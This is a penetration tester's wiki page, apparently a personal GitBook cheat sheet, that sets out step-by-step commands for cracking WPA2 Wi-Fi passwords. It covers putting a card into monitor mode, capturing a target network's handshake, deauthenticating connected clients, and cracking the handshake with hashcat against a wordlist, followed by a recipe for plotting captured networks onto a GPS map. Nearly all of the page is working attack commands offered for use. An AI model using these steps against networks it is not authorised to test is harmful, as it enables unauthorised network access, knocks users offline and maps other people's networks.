🤓
TurvSec Wiki
  • 👨‍💻Who is Mr Turvey
  • Blogs and Notes
    • Techie Blogs
      • Troubleshooting Nessus
      • Bypassing CAPTCHA
      • How to Proxy Linux Traffic
    • Miscellaneous Blogs
      • PSD2 and Open Banking
      • Cheap Pen Testing
      • Top 10 Pen Testing Tools
      • Scoping Web Applications
  • Web App Testing
    • 🌍Content Discovery
      • 🔎Subdomain Enumeration
      • 📃Dir & Page Enumeration
    • 💉Injections
      • CSV Injection
    • 🕸️JSON WEB TOKENS
    • 🔏Testing SSL/TLS
    • 📮Testing APIs with POSTMAN
  • Offensive Security
    • 🎣Phishing with Evilginx2
    • 🔐WPA2 Cracking
  • Physical Security
    • 👨‍✈️Social Engineering
  • Tools
    • Burp2API - BurpSuite to JSON
    • allthewayback - Search Wayback
    • Thicc - Thick App Testing Aid
Powered by GitBook
On this page
  1. Offensive Security

WPA2 Cracking

A few commands to crack WPA2 Handshakes

Start monitor mode

 airmon-ng start wlan0 

Start capturing wireless data

 airodump-ng wlan0mon 

Start capturing wireless data with focus on one SSID

 airodump-ng --bssid 1C:B8:AQ:3X:64:A0 -c 6 --write File_Name wlan0mon 

Deauthenticate clients connected to access point

 aireplay-ng --deauth 100 -a 01:81:31:78:24:76 wlan0mon 

Stop monitor mode

airmon-ng stop wlan0mon 

Change .cap to .hccapx for hashcat cracking

https://hashcat.net/cap2hccapx/

Hashcat Cracking

hashcat64.exe -a 0 -m 2500 --session=all --force -o "Output_File_Path" --outfile-format=3 -w 2 "Hash_File_Path" "Word_List_File_Path"

PLOT WIRELESS NETWORKS TO GPS MAP

Start airodump with GPS mode (Need GPS adaptor)

lsusb (finds the USB GPS) 
gpsd /dev/ttyUSB0
airodump-ng wlan0mon -w Building1Outside --gpsd

Use the output .csv file from the above with kismet to gain .kml file

giskismet --csv triangle-01.kismet.csv -q "SELECT * FROM wireless" -o all.kml 

Import .KML file to Google maps for GPS plotting

PreviousPhishing with Evilginx2NextSocial Engineering

Last updated 1 year ago

🔐
https://www.google.com/maps